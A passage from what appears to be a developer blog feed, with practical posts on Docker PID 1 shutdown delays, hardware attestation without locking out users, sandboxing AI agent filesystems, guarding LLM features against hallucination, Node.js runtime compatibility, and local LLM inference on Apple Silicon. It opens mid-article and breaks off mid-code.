Audit what you actually need from the renderer. DRM, specific codecs, Chromium-only DevTools features — those will push you back to the bundled approach. Otherwise you're paying for capabilities you don't ship.
Treat the native shell as a port boundary. Keep it tiny. All business logic stays in JS or in clearly-scoped native modules. The shell should do windows, IPC, and OS APIs — nothing else.
Read existing open-source shells before you write your own. Tauri (Rust) and Wails (Go) both expose their shells as readable references. The patterns transfer to a Zig shell cleanly even if you don't use those projects directly.
Test on the slowest target machine you can find. WebKitGTK on a budget Linux box behaves nothing like WKWebView on Apple silicon. The differences are mostly in CSS edge cases and JS engine quirks, and you want to know about them before users do.
Don't pretend it's a free lunch. You'll write more native code than you would with the bundled-runtime approach. You'll juggle three slightly different webview APIs. The win is real, but it has a cost.

For most apps — most of them, honestly — the trade is worth it. Users get faster startup. Laptops stay cooler. Installers stop being half a gigabyte. The shell stays a few hundred lines per platform, which is something one person can actually own.

Why Your Docker Containers Refuse to Die: The PID 1 Problem

Alan West — Mon, 11 May 2026 00:21:05 GMT

You hit docker stop. Nothing happens. You wait ten seconds. Docker eventually sends SIGKILL. The container disappears, but only after a frustrating timeout. Your CI pipeline is slower than it should be, your Kubernetes pod terminations are sluggish, and you have a vague feeling something is wrong.

I hit this exact issue last month while debugging a deployment that took 90 seconds to roll out a single replica. Turned out to be the same boring culprit I've seen on at least four other projects: the PID 1 problem.

Let me walk you through what's actually happening, why it bites so many teams, and how to fix it properly.

The frustrating symptom

Here's what it usually looks like. You've got a Node app, a Python service, or whatever. You build it, run it, and try to stop it:

docker run --name myapp -d my-image:latest

... later ...

time docker stop myapp

real 0m10.234s

Ten seconds. Every. Single. Time. That's the default --time value before Docker gives up and sends SIGKILL. If you're orchestrating dozens of containers, this adds up fast.

Worse, in production, this means your rolling deploys are slow, your zero-downtime story is shaky, and any in-flight requests are getting cut off ungracefully because your app never had a chance to clean up.

The root cause: PID 1 is weird

Here's the part most tutorials skip. In Linux, the process with PID 1 has special status. It's the init process. The kernel treats it differently in two important ways:

It does not get the default signal handlers. If you send SIGTERM to PID 1, and the process has no explicit handler for it, the signal is ignored. This is a kernel-level protection meant to keep init from being killed accidentally.
It is responsible for reaping zombie child processes. When any process in the system has its parent die, it gets re-parented to PID 1. When those orphans eventually exit, PID 1 must call wait() on them or they become zombies forever.

Now, in a Docker container, your application process is PID 1. So if your Node script doesn't explicitly handle SIGTERM, Docker's stop signal goes nowhere. The kernel quietly drops it. Docker waits its timeout, then nukes you with SIGKILL.

You can confirm this is happening with a quick test:

Inside a running container

ps -ef

UID PID PPID CMD

root 1 0 node server.js

That 1 next to your app is the problem.

The proof, in one tiny example

Let me show you the bug in the smallest possible repro. Save this as app.js:

// No SIGTERM handler setInterval(() => console.log('alive'), 1000);

And a Dockerfile:

FROM node:20-alpine COPY app.js /app.js CMD ["node", "/app.js"]

Build and run:

docker build -t pid1-demo . docker run --name demo -d pid1-demo time docker stop demo

You'll wait the full 10 seconds. Now compare with this:

// With SIGTERM handler process.on('SIGTERM', () => { console.log('shutting down cleanly'); process.exit(0); }); setInterval(() => console.log('alive'), 1000);

Rebuild and stop. Instant. The container exits in well under a second because PID 1 now actually responds to the signal.

Fix #1: Handle signals in your app

The most correct fix is to handle SIGTERM (and usually SIGINT) in your application code. This is the right answer because your app probably needs to do cleanup anyway: drain HTTP connections, finish in-flight DB writes, flush logs.

For a Node HTTP server:

const server = http.createServer(handler); server.listen(3000);

function shutdown() { console.log('SIGTERM received, draining...'); // Stop accepting new connections, finish existing ones server.close(() => process.exit(0)); // Hard stop if drain takes too long setTimeout(() => process.exit(1), 8000).unref(); }

process.on('SIGTERM', shutdown); process.on('SIGINT', shutdown);

For Python with Flask/Gunicorn, Gunicorn already handles this for you. For a raw script:

import signal, sys def shutdown(signum, frame): print('cleaning up') sys.exit(0) signal.signal(signal.SIGTERM, shutdown) signal.signal(signal.SIGINT, shutdown)

Fix #2: Use a proper init process

Sometimes you can't modify the app, or you've got a shell script as your entrypoint that spawns multiple children. In that case, run a tiny init process as PID 1 and let it handle signals and zombie reaping.

The usual choice is tini, which is around 24KB and does exactly one thing well. Docker actually ships with built-in tini support via the --init flag:

docker run --init --name demo -d pid1-demo

That's it. Docker injects a small init binary as PID 1, your app becomes PID 2, signals get forwarded properly, and zombies get reaped.

If you want it baked into the image instead of relying on the runtime flag:

FROM node:20-alpine RUN apk add --no-cache tini COPY app.js /app.js

tini becomes PID 1 and execs your command as a child

ENTRYPOINT ["/sbin/tini", "--"] CMD ["node", "/app.js"]

For Debian-based images, swap apk add for apt-get install -y tini. There's also dumb-init, which is similar and slightly different in signal-forwarding behavior. Both are fine.

The shell-form CMD trap

One more gotcha. If you write your CMD in shell form, you actually get sh -c "..." as PID 1, not your app:

Shell form — PID 1 is /bin/sh, NOT node

CMD node /app.js

Exec form — PID 1 is node

CMD ["node", "/app.js"]

And sh is also one of those processes that ignores most signals by default. Always prefer exec form unless you genuinely need shell features. If you do need shell expansion, wrap it with exec:

CMD ["sh", "-c", "exec node /app.js"]

The exec replaces the shell process with node, so node still ends up as PID 1.

Prevention checklist

A few habits that have saved me a lot of debugging time:

Default to exec-form CMD and ENTRYPOINT. It's a one-line change that prevents an entire class of bugs.
Add --init or bake in tini for any image where you don't fully control the application's signal handling.
Test your shutdown path locally with time docker stop . If it takes more than two or three seconds, something is wrong. Catch it before production does.
Set sensible stopGracePeriodSeconds in Kubernetes to match your app's actual drain time. Don't just leave it at the 30-second default and hope.
Log on SIGTERM receipt. When something goes wrong in production, you want to know whether the signal arrived at all or was silently dropped.

The meme version of this is: containers are easy, until they aren't. The boring reality is that Linux process semantics didn't change just because we put a thin namespace wrapper around them. PID 1 is special, signals are easy to drop, and zombies accumulate. Once you internalize that, half the weird container shutdown issues you'll ever see stop being mysterious.

How to handle hardware attestation without locking out real users

Alan West — Mon, 11 May 2026 00:05:05 GMT

Last month I got a bug report that made me close my laptop and go for a walk. A paying user couldn't log in. Their device was rooted? Not according to them. Custom ROM? Yes. A modern, security-hardened Android build with verified boot and hardware-backed keys. The kind of setup that's arguably more secure than a stock device.

My app rejected them anyway. Why? Because somewhere along the way, I had wired up the strictest integrity verdict I could find and called it a day. Classic mistake.

If you've shipped any mobile app that talks to a backend, you've probably run into the same trap. Let's dig into why hardware attestation locks out legitimate users, and what to actually do about it.

The frustrating problem

You add an integrity check to gate sensitive operations — login, payments, key recovery, whatever. The API gives you a verdict. You check the strongest tier. Ship it.

Then the support tickets roll in:

Users on alternative Android distributions can't authenticate
Users on older but perfectly functional devices get blocked
Users who happen to use a non-mainstream device manufacturer can't even sign up
Corporate users with managed devices fail randomly

And here's the kicker: the people getting blocked are often the most security-conscious users you have. They're running verified boot. Their keys live in a real TEE. The cryptographic chain is solid. But your app treats them like an attacker because a single boolean came back false.

Root cause: attestation isn't binary

Hardware attestation was designed to answer one question: "is this key stored in hardware that I trust?" That's it. A clean, useful primitive.

The problem is that platform-level integrity APIs bolt a lot of extra opinions on top:

Is the bootloader locked with a specific vendor's key?
Is the OS signed by a specific vendor?
Is this device on an approved allow-list?
Has the device passed a specific certification program?

These are policy decisions dressed up as security guarantees. A device can have rock-solid hardware-backed keys and fail these checks — because the checks aren't really about hardware security, they're about ecosystem control.

When your code does this:

// DON'T DO THIS
if (verdict.deviceIntegrity != STRONG_INTEGRITY) {
    return AuthResult.Rejected
}

You're not asking "can I trust this device's cryptographic operations?" You're asking "is this device on the vendor's preferred list?" Those are different questions, and conflating them is how you end up rejecting legitimate users.

Step-by-step solution

The fix is to build a tiered trust model. Treat attestation as one signal among many, and gate operations based on actual risk — not on a single boolean from a black box.

Step 1: Verify the key attestation chain yourself

Instead of relying solely on the platform's verdict, validate the hardware-backed key attestation directly. On Android this means parsing the X.509 certificate chain from a hardware-backed Keystore key and checking the attestation extension.

fun verifyKeyAttestation(certChain: List<X509Certificate>): AttestationResult {
    // Walk the chain back to a known root
    val root = certChain.last()
    if (!isKnownAttestationRoot(root)) {
        return AttestationResult.UnknownRoot
    }

    // The leaf cert contains the attestation extension (OID 1.3.6.1.4.1.11129.2.1.17)
    val leaf = certChain.first()
    val extension = leaf.getExtensionValue("1.3.6.1.4.1.11129.2.1.17")
        ?: return AttestationResult.NoAttestation

    val parsed = parseAttestationExtension(extension)

    // securityLevel tells us where the key actually lives
    return when (parsed.keymasterSecurityLevel) {
        SECURITY_LEVEL_STRONGBOX -> AttestationResult.StrongBox
        SECURITY_LEVEL_TRUSTED_ENVIRONMENT -> AttestationResult.Tee
        SECURITY_LEVEL_SOFTWARE -> AttestationResult.SoftwareOnly
        else -> AttestationResult.Unknown
    }
}

This tells you what you actually need to know: where the private key lives. A TEE-backed key is a TEE-backed key, regardless of which OS is running on top.

Google publishes the Android Keystore attestation root certificates for verification. Use those.

Step 2: Tier your operations by risk

Not every action needs maximum assurance. Build a matrix:

enum class TrustTier { Strong, Standard, Minimal }

fun requiredTier(operation: Operation): TrustTier = when (operation) {
    Operation.Login -> TrustTier.Standard
    Operation.ViewBalance -> TrustTier.Standard
    Operation.TransferUnderLimit -> TrustTier.Standard
    Operation.TransferOverLimit -> TrustTier.Strong
    Operation.ChangeRecoveryEmail -> TrustTier.Strong
    Operation.ReadOnlyPublicData -> TrustTier.Minimal
}

A user who can't pass Strong-tier checks should still be able to log in and see their account. They just hit step-up authentication for high-risk operations.

Step 3: Add server-side signal fusion

Device attestation is one input. On the server, combine it with everything else you know:

def assess_risk(session):
    score = 0

    # Attestation signal — graded, not binary
    if session.attestation == 'strongbox':
        score += 40
    elif session.attestation == 'tee':
        score += 30
    elif session.attestation == 'software':
        score += 10

    # Behavioral signals carry real weight
    if session.device_known_for_account(days=30):
        score += 25
    if session.ip_in_user_history():
        score += 15
    if session.geo_consistent_with_recent():
        score += 10

    # Negative signals
    if session.velocity_anomaly():
        score -= 30
    if session.is_known_bad_asn():
        score -= 20

    return score

A score above your threshold gets through. Below it, you challenge — TOTP, WebAuthn, email confirmation. You almost never need to hard-reject.

Step 4: Use WebAuthn as your primary trust anchor

If you really care about phishing-resistant auth and device binding, the standardized answer is WebAuthn. It uses the same hardware-backed keys, gives you cryptographic proof of possession, and doesn't depend on a single vendor's integrity verdict.

// Client-side registration — relies on the platform authenticator's hardware
const credential = await navigator.credentials.create({
  publicKey: {
    challenge: serverChallenge,
    rp: { name: 'My App' },
    user: { id: userId, name: email, displayName: name },
    pubKeyCredParams: [{ type: 'public-key', alg: -7 }], // ES256
    authenticatorSelection: {
      authenticatorAttachment: 'platform',
      userVerification: 'required',
      residentKey: 'preferred',
    },
    // attestation: 'none' is fine for most apps — you get the hardware binding
    // without locking out users whose attestation cert isn't on an allow-list
    attestation: 'none',
  },
});

Using attestation: 'none' is the key detail. You still get hardware-backed key storage and the phishing-resistance benefits. You just don't gate on a specific vendor's signature being present.

Prevention tips

A few habits that save you from this whole class of bug:

Log every attestation rejection with full context. When users complain, you need to see exactly which signal failed and what their device looked like.
Test on at least one non-stock device. Borrow one if you have to. The bug you'll find is almost always real.
Document your trust model explicitly. Write down which operations need which tier and why. Future-you will rip out a lot of the gates once you see them in writing.
Never put the integrity check in the critical login path without a fallback. A vendor API outage shouldn't lock out 100% of your users.
Treat attestation verdicts as advisory, not authoritative. The actual question is "do I have enough confidence to permit this specific action?" — that's a server-side judgment call, not a client-side boolean.

The deeper lesson here is that security and ecosystem control got entangled, and we shipped libraries that conflate them. As app developers we don't have to play along. The cryptographic primitives — hardware-backed keys, attestation chains, WebAuthn — work fine on their own. Use those directly, and you get real security without telling your most careful users to go away.

Sandboxing AI Agent Filesystems: Containers vs Virtual FS Layers

Alan West — Sun, 10 May 2026 20:08:41 GMT

If you've ever wired up an AI agent to do real work, you've probably hit the same wall I did: filesystem access is a minefield. Give it too much rope and it'll happily rm -rf something important. Lock it down too hard and it can't actually do anything useful.

I've been bouncing between three approaches over the last year — raw FS access with allowlists, container-based isolation, and most recently a virtual filesystem layer. Each has real tradeoffs. The trending strukto-ai/mirage project pitches itself as a unified virtual filesystem for AI agents, which got me thinking about when this approach actually makes sense versus the alternatives. I'll be honest up front: I've only skimmed Mirage's repo and poked at the examples, so treat my notes on it as provisional rather than a deep review.

Why this is harder than it looks

When a coding agent says "read this file," what should that actually do? In a naive setup, the agent process can read anything the host user can read. That's fine for a throwaway VM. It's terrifying on a dev laptop with SSH keys and tokens sitting around.

The three things I want from any FS access layer:

Bounded blast radius — the agent can't escape its assigned working set
Reversibility — I can review and roll back changes before they hit disk for real
Predictable paths — the agent sees the same paths whether it's running locally, in CI, or on a remote sandbox

Most setups give you one or two of these. Getting all three is where the design choices get interesting.

Approach 1: Raw FS with allowlists

This is the baseline. You hand the agent a working directory and trust it to behave.

# Naive approach: agent gets a working dir, full access inside it
from pathlib import Path

WORK_DIR = Path("/tmp/agent-workspace").resolve()

def safe_read(rel_path: str) -> str:
    # Re-resolve every call to defeat symlink shenanigans
    target = (WORK_DIR / rel_path).resolve()
    if not target.is_relative_to(WORK_DIR):
        raise PermissionError("path escapes workspace")
    return target.read_text()

def safe_write(rel_path: str, content: str) -> None:
    target = (WORK_DIR / rel_path).resolve()
    if not target.is_relative_to(WORK_DIR):
        raise PermissionError("path escapes workspace")
    target.write_text(content)

Where this works: quick experiments, throwaway scripts, anything where the workspace is already disposable.

Where it falls over: symlinks (an agent that creates link -> /etc and then writes through it can slip past a sloppy check), TOCTOU races, and the simple fact that "undo the last 30 minutes of agent work" becomes a git stash scavenger hunt.

Approach 2: Container isolation

The next step up is putting the whole agent in a container with a bind-mounted workspace.

# Run the agent inside a container, only mount what it needs
docker run --rm \
  --network=none \
  -v "$PWD/workspace:/work:rw" \
  -v "$PWD/readonly-context:/ctx:ro" \
  --read-only \
  --tmpfs /tmp:size=512m \
  agent-image:latest

This is what I default to for anything touching real code. The blast radius is genuinely bounded — even if the agent goes off the rails, it can only mess up /work.

The downside is startup cost and the friction of getting tooling into the container. Every new language runtime, every binary the agent might invoke, has to be pre-baked into the image or installed at runtime. I've spent more time debugging "why doesn't node exist in here" than I'd like to admit.

Approach 3: A virtual filesystem layer

This is where projects like Mirage come in. The pitch, as I read it, is that the agent talks to a virtual filesystem API instead of the real FS, and the layer underneath decides what actually happens — overlay changes in memory, commit them on confirmation, expose a consistent path namespace across backends. Check the official repo before relying on specifics; the project looks early and the API surface may shift.

Conceptually, the pattern looks like this:

# Sketch of the virtual FS pattern (not Mirage's exact API)
fs = VirtualFS(
    root="./project",   # underlying real directory
    mode="overlay",     # writes go to an overlay, not the real FS
)

# Agent calls look like normal FS ops
fs.write("src/app.py", new_content)
fs.read("README.md")

# But changes are staged, not committed
diff = fs.pending_changes()  # inspect what the agent did
fs.commit()                  # apply to real FS
# or
fs.discard()                 # throw it all away

What I like about this model:

Review-before-apply is built in. The agent can do 50 file edits and I get to see the diff before any of them touch disk.
Path consistency. The agent always sees ./src/app.py, regardless of whether the backend is a local dir, an object store, or an in-memory overlay.
Cheaper than containers for the common case of "edit some files, run some checks."

What I'm cautious about:

It's another abstraction layer. When something breaks, you're now debugging the agent, the VFS, and the underlying storage.
Isolation is logical, not physical. If the agent shells out to a subprocess, that subprocess sees the real FS unless you also wrap exec calls. A container actually contains; a virtual FS doesn't, by itself.
It's new. I haven't tested Mirage thoroughly enough to vouch for edge cases like large binary files, partial writes, or concurrent agents on the same overlay.

Side by side

	Raw FS + allowlist	Container	Virtual FS layer
Setup cost	Lowest	Highest	Medium
Blast radius	Workspace dir (if careful)	Container boundary	Logical workspace
Subprocess isolation	None	Yes	None (unless wrapped)
Review before apply	Manual (git)	Manual (git)	Built into the model
Startup latency	None	Seconds	Milliseconds
Good for	Quick scripts	Real code changes	Iterative agent loops

How I'd pick today

If I'm running a coding agent against a repo I care about, I'm still reaching for containers first. The physical isolation is just too valuable when an agent decides to get creative with find -delete.

If I'm building an interactive loop — agent proposes changes, I approve, agent continues — a virtual FS layer is genuinely better. The commit/discard semantics map directly onto the workflow, and you skip the container startup tax on every iteration.

If I'm prototyping and the workspace is already disposable, raw FS with a path-resolution check is fine. Don't over-engineer it.

A migration sketch

If you're currently on raw FS and want to try a VFS layer, the migration is less invasive than you'd expect:

# Before: direct FS calls scattered through the agent's tools
def read_file_tool(path: str) -> str:
    return Path(path).read_text()

def write_file_tool(path: str, content: str) -> None:
    Path(path).write_text(content)

# After: same interface, FS calls go through the virtual layer
def read_file_tool(path: str) -> str:
    return fs.read(path)

def write_file_tool(path: str, content: str) -> None:
    fs.write(path, content)  # staged, not yet on disk

# New control surface: review/commit between agent steps
def step_complete():
    show_diff(fs.pending_changes())
    if user_approves():
        fs.commit()
    else:
        fs.discard()

The tool interface barely changes. What changes is the control loop around it — you now have a place to insert review and approval that you didn't have before.

That's the real reason I'm watching this category. Containers won the "how do we sandbox processes" question a decade ago. The "how do we sandbox an agent's intentions before they become actions" question is still wide open, and a virtual filesystem is one of the more interesting answers I've seen lately.

Debugging confidently wrong answers from LLM-powered features

Alan West — Sun, 10 May 2026 16:50:23 GMT

The bug that took two weeks to surface

A few months back I shipped a feature that used a language model to summarize support tickets and suggest responses. Internal QA loved it. The demo went great. Two weeks after launch, our support lead pinged me on Slack: "Are these summaries... making things up?"

They were. Not always. Maybe one in fifty. But the ones that were wrong looked exactly as confident as the correct ones — same tone, same structure, same plausible-looking detail. A ticket about a failed payment got summarized as "user wants to cancel subscription." A complaint about slow load times got rephrased as "user reports outage in EU region."

If you've shipped anything LLM-backed in production, this story is probably familiar. The model isn't broken. The benchmark scores look great. But the tail is full of confidently wrong answers, and your users are the ones finding them.

Here's what I learned debugging this, and the layered approach that finally got our hallucination rate down to something I could live with.

Why this happens (and why it's hard to catch)

The first thing to internalize: a language model produces fluent text whether or not the underlying reasoning is sound. There's no "I'm not sure" signal you can read off the surface output. The model that confidently invents a detail and the model that confidently states a true fact look identical from your application's perspective.

Worse, evaluation suites usually skew toward typical inputs. Your eval probably hits the median case. Production traffic hits the tail — weird formatting, unusual entities, contradictory context, ambiguous pronouns, multi-language messages. Tail behavior is where hallucinations live.

In our case, the model was misreading tickets where the customer mentioned multiple unrelated topics. The summarizer would latch onto whichever topic appeared first or had the strongest sentiment, and confidently summarize that as the whole ticket.

Step 1: Constrain the output structure

Free-form prose gives the model room to confabulate smoothly. Constraining the output forces it to commit to specific claims you can verify.

Instead of asking for a summary, I asked for a structured object:

# Bad: free-form prose, hard to validate
prompt = f"Summarize this ticket:\n{ticket}"

# Better: structured claims we can check one by one
schema = {
    "primary_issue": "str",        # one short phrase, must appear in source
    "customer_intent": "enum[refund, cancel, technical_help, billing, other]",
    "mentioned_order_ids": "list[str]",
    "sentiment": "enum[neutral, frustrated, angry]",
    "requires_human": "bool",
}

JSON Schema or function-calling features from most providers work even better, since they constrain at the decoding layer. The point is: you want discrete claims, not paragraphs. Claims you can check. Prose you cannot.

Step 2: Add a verifier pass

This was the change that actually moved the needle. Run the output through a second model call whose only job is to check whether each claim is supported by the source.

def verify_claim(source_text: str, claim: str) -> str:
    prompt = (
        "You are a strict fact-checker. Given the SOURCE and the CLAIM,\n"
        "answer with exactly one word: YES, NO, or UNCERTAIN.\n"
        "YES means the claim is explicitly supported by the source.\n"
        f"SOURCE:\n{source_text}\n\nCLAIM:\n{claim}\n\nANSWER:"
    )
    return call_llm(prompt, max_tokens=4).strip().upper()

def accept(source, output) -> bool:
    # Treat UNCERTAIN as failure on high-stakes paths.
    for claim in output.claims():
        if verify_claim(source, claim) != "YES":
            return False
    return True

A few things matter for the verifier:

Use a different prompt structure than the generator. You don't want correlated failure modes.
Force a discrete answer (YES/NO/UNCERTAIN). No prose, no chain-of-thought leaking into the output.
Treat UNCERTAIN as failure for high-stakes outputs. Cheap, conservative, surprisingly effective.

Yes, you're paying for an extra call. In our case cost roughly doubled per request, and that was fine — the alternative was customer-visible mistakes.

Step 3: Deterministic guards on the things you can actually check

LLMs don't need to be involved in checking facts that have a definite answer. If your output mentions an order ID, regex-check the format and look it up in your database. Numbers, dates, IDs, enum values, email addresses — all deterministic.

I added a small guard layer that runs after the verifier:

import re

ORDER_ID = re.compile(r"^ORD-\d{8}$")

def guard(output, ticket) -> bool:
    for oid in output.mentioned_order_ids:
        if not ORDER_ID.match(oid):
            return False  # malformed ID
        if oid not in ticket.body:
            return False  # model invented an order ID
        if not db.orders.exists(oid):
            return False  # ID doesn't resolve
    return True

If any deterministic check fails, we don't show the response at all. Fall back to a templated message: "we received your ticket, an agent will respond shortly." Boring, correct, never wrong.

Step 4: Log the disagreements

For every request, log the generator output, the verifier verdict, and the guard outcome. Then build a dashboard of disagreements. Within a week you'll see patterns — specific input shapes that trigger more verifier failures, specific claim types that get confabulated.

This is where you get the data to improve your prompt, swap models, or fine-tune. Without it you're guessing.

Prevention tips for next time

A few things I'd do from day one on the next project:

Decide on output structure before you write the prompt. Pick the schema first, then write a prompt that produces it. Don't bolt structure on later.
Build evals from production logs, not synthetic examples. Synthetic examples test what you imagined. Logs test what users actually do.
Treat the model as one component, not the whole system. Validators, guards, retrieval, deterministic checks — these aren't workarounds, they're the architecture. A good LLM feature is mostly not the LLM.
Keep a templated fallback for every code path. When the model is uncertain, users should get a boring correct response — not a creative wrong one.
Sample and review. Set up a review queue, look at 50 outputs a week, write down what you find. There's no substitute.

The bigger lesson

The thing I keep coming back to is that fluency is not correctness. A model that produces beautiful, well-structured, confident text saying the wrong thing is in some sense more dangerous than one that produces obvious garbage. Garbage gets caught. Confident wrongness gets shipped.

Build the verifier. Add the guards. Log everything. Then sleep slightly better.

Debugging the 0.2%: When Node.js Code Fails on Alternative Runtimes

Alan West — Sun, 10 May 2026 16:37:54 GMT

You ever migrate a Node.js service to an alternative JavaScript runtime, watch most of your tests pass, then spend an entire afternoon hunting down the handful that fail? I have. Three times this year.

Here's the thing about runtime compatibility numbers — they sound great in headlines. "99.8% Node.js compatibility" is a real flex. But when you're the dev whose login flow lives in the 0.2%, that number suddenly feels useless.

This post walks through how I debug compatibility failures when running existing Node code on alternative runtimes. The approach is the same regardless of which runtime you're targeting.

The Problem

You've got an existing Node.js codebase. It works fine on Node 20. You decide to try a faster runtime — maybe for cold start improvements, maybe just to benchmark. You install it, point it at your entry file, and...

$ alt-runtime run server.js
TypeError: process.binding is not a function
    at requireBuiltin (internal/util.js:42:18)
    at Module._compile (...)

Or worse — it starts. Tests pass. Production breaks two days later because some edge case in crypto.createHash returns a slightly different object shape.

These failures look random. They aren't. They cluster around a few predictable categories.

Root Cause: Where Compatibility Actually Breaks

Most "Node-compatible" runtimes implement the public node:* API surface. The trouble is that "Node compatible" is a fuzzy claim, and the gaps usually fall into four buckets:

1. Internal APIs

Stuff like process.binding, internalBinding, or anything from node:internal/*. These are explicitly private, but plenty of npm packages rely on them. If a package was last updated in 2017, there's a decent chance it's reaching into Node internals you didn't know about.

2. Behavioral differences in public APIs

The function signature matches Node. The return type matches. But the behavior is subtly different — different error codes, different event ordering, different timing for setImmediate vs process.nextTick.

3. Missing modules

Whole modules sometimes aren't implemented. node:vm, node:cluster, and node:worker_threads are the usual suspects, depending on the runtime.

4. Native addons

If your dependency tree pulls in anything that compiles a .node file, alternative runtimes often can't load it without a workaround. N-API support varies in maturity.

Step-by-Step Debugging

Here's the workflow I run through every time. It usually finds the issue in 15-30 minutes.

Step 1: Get a clean reproduction

Don't debug inside your full app. Strip it down. I keep a repro/ directory in every project for exactly this:

// repro/test-crypto.js
// Minimal repro for the hash mismatch I saw in auth.js
const crypto = require('node:crypto');

const h1 = crypto.createHash('sha256');
h1.update('test');
console.log('first digest:', h1.digest('hex'));
// Calling digest() twice — does this throw or return empty?
console.log('second digest:', h1.digest('hex'));

Run the same file under Node and the alternative runtime. If the output differs, you've localized the failure.

Step 2: Find which API is implicated

When the stack trace is unhelpful, instrument the suspect module. I use a tiny tracing Proxy:

// trace.js — wraps a module and logs every call shape
function trace(mod, name) {
  return new Proxy(mod, {
    get(target, prop) {
      const value = target[prop];
      if (typeof value !== 'function') return value;
      return (...args) => {
        // Log call shape so I can diff runtimes side-by-side
        console.error(`[${name}.${String(prop)}]`, args.map(a => typeof a));
        return value.apply(target, args);
      };
    }
  });
}

const fs = trace(require('node:fs'), 'fs');
// now use `fs` as normal — every call gets logged with arg types

Run this on both runtimes and diff the output. The first diverging line is almost always your culprit.

Step 3: Check the runtime's compatibility tracker

Every serious alternative runtime publishes a known-incompatibilities list. Find it in their official docs before you start writing workarounds — odds are someone already filed your issue and there's a documented workaround.

A quick search of the runtime's GitHub issues with is:issue node compat is also worth thirty seconds.

Step 4: Apply the right kind of fix

Once you know what's broken, the fix usually falls into one of three patterns:

// Pattern A: feature-detect and branch
const hasFeature = typeof process.someAPI === 'function';
const result = hasFeature
  ? process.someAPI(input)
  : fallbackImplementation(input); // pure-JS fallback

// Pattern B: pin a userland polyfill instead of the runtime built-in
// e.g. use a pure-JS hashing lib for one specific call site
//      where the native crypto behavior diverges

// Pattern C: isolate the bad path behind a runtime check
const runtime =
  typeof globalThis.Bun !== 'undefined' ? 'bun' :
  typeof globalThis.Deno !== 'undefined' ? 'deno' :
  'node';

module.exports = runtime === 'node'
  ? require('./node-impl')
  : require('./portable-impl');

Pattern A is the cleanest. Pattern C is the ugliest, but sometimes you have no choice — especially with native addons.

Prevention: Stop Hitting These in the First Place

A few habits that have saved me real time:

Run your full test suite on the alt runtime in CI from day one. Not just unit tests — the integration tests that exercise weird APIs. A green build today doesn't mean green tomorrow when you bump a dep.
Audit your dependency tree for native addons. npm ls --all or look for binding.gyp files in node_modules. Native addons are where most of my migration pain comes from.
Avoid undocumented Node APIs in your own code. If it's not in the official Node API docs, it's not portable. process.binding, _extend, anything starting with an underscore — pretend they don't exist.
Watch the runtime's release notes for "Node compat" entries. Every release usually moves the line. Knowing what just got fixed saves you from working around something that no longer needs working around.

The Honest Take

The 99.8% number isn't lying. It's just that "passing the test suite" and "running my specific production workload" are different problems. Test suites cover documented APIs and well-trodden paths. Your production code does whatever your dependencies decided to do five years ago.

The good news: if you adopt the debugging workflow above, the 0.2% becomes tractable. Most of the failures I've hit have a 30-minute fix once I stop guessing and start tracing.

Pick a runtime, run your tests, and when something breaks — don't panic, instrument it.

Why local LLM inference stalls on Apple Silicon (and how to fix it)

Alan West — Sun, 10 May 2026 16:31:34 GMT

I spent a chunk of last month trying to run a 30B-class model locally on my M2 Max. 64GB of unified memory, a stack of GPU cores, no other apps running. Should be smooth. Instead I got around 3 tokens per second, a fan that sounded like a leaf blower, and the slow creeping suspicion that I was holding it wrong.

If you've tried serious local inference on Apple Silicon, you've probably hit this. The hardware is genuinely capable. The software stack often isn't — or rather, the generic software stack isn't. This came back into focus for me when antirez (yes, the Redis guy) posted ds4, a from-scratch Metal inference engine targeting DeepSeek. The README is pretty explicit that it's a focused, learning-oriented project rather than a general framework, but seeing it made me want to write up why the focused approach keeps winning on Apple Silicon, and what you can do about slow local inference today.

The root cause: it's bandwidth, not FLOPS

Here's the thing nobody tells you when you start: during token-by-token decoding, an LLM is almost entirely memory-bandwidth-bound, not compute-bound. Every generated token requires streaming the full set of weights (or at least every weight touched by that forward pass) from memory through the GPU, plus reading and writing the KV cache.

A quick napkin calculation. Say you have a 7B parameter model in 4-bit quantization. That's roughly 4GB of weights. To generate one token, you read all 4GB once. If your effective memory bandwidth to the GPU is around 200 GB/s (well under the theoretical peak on M-series Max chips, but realistic for many workloads), the floor on per-token latency is:

4 GB / 200 GB/s = 20 ms => ~50 tokens/sec ceiling

If you're getting 3 tokens/sec, you're not bandwidth-limited. You're losing somewhere in the stack. The questions are: where, and why.

Where time actually goes

When I profiled my run with Instruments and the Metal System Trace template, three things jumped out:

Tons of tiny kernel launches. Each transformer layer was firing off many small Metal compute encoders — softmax, RMSNorm, rotary embeddings, masks — and the GPU spent more time in dispatch overhead than in actual math.
Quantization on the wrong side of the bus. Some kernels were dequantizing weights into FP16, writing the FP16 back to memory, then doing the matmul. That literally destroys the point of quantization, which is to shrink the bytes you stream.
KV cache being copied around. The cache was being reallocated on every step in some paths instead of being grown in place.

Generic frameworks make these mistakes because they're trying to be everything to everyone. A focused inference engine for one model family can hardcode the right answers.

Step 1: fuse your kernels

The single biggest win is fusing the small operations in each transformer block into one or two big kernels. Here's the pattern I converged on, in pseudocode:

// Fused: RMSNorm -> Q/K/V projection -> RoPE
// Avoids three separate dispatches and two round trips through memory.
kernel void attn_qkv_rope(
    device const half*  x        [[buffer(0)]],  // input activations
    device const uint8_t* w_qkv  [[buffer(1)]],  // 4-bit packed weights
    device const half*  scales   [[buffer(2)]],  // per-group scales
    device half*        q_out    [[buffer(3)]],
    device half*        k_out    [[buffer(4)]],
    device half*        v_out    [[buffer(5)]],
    constant Params&    p        [[buffer(6)]],
    uint tid [[thread_position_in_grid]]) {
    // 1) RMSNorm in-register, no temp buffer back to global mem
    float norm = rms_norm_inline(x, tid, p);

    // 2) Dequant + GEMV in the same pass: each weight tile is
    //    unpacked into registers and immediately consumed.
    half3 qkv = dequant_gemv_q4(w_qkv, scales, norm, tid, p);

    // 3) Apply rotary embeddings before the write-out.
    apply_rope(qkv, tid, p);

    write_split(q_out, k_out, v_out, qkv, tid);
}

Key idea: weights stay packed in 4-bit form in memory. They're unpacked into registers inside the kernel and consumed immediately. You never write a dequantized copy back to global memory. The matmul reads the small representation; the math happens on the wider one inside SIMD units.

That single change took my throughput on a small 7B model from "painful" to "actually usable." Your numbers will vary — but the principle holds for any chip with a memory wall.

Step 2: stop reallocating the KV cache

This one bit me hard. A naive implementation grows the KV tensor by allocating a bigger buffer each step and copying. On Metal that means a MTLBlitCommandEncoder round trip for every token. Don't do this.

Preallocate once, write in place:

// Preallocate KV for max_seq_len at startup.
// Writes are O(1) per token; no resize, no copy.
typedef struct {
    half* k;            // [n_layers][max_seq][n_kv_heads][head_dim]
    half* v;
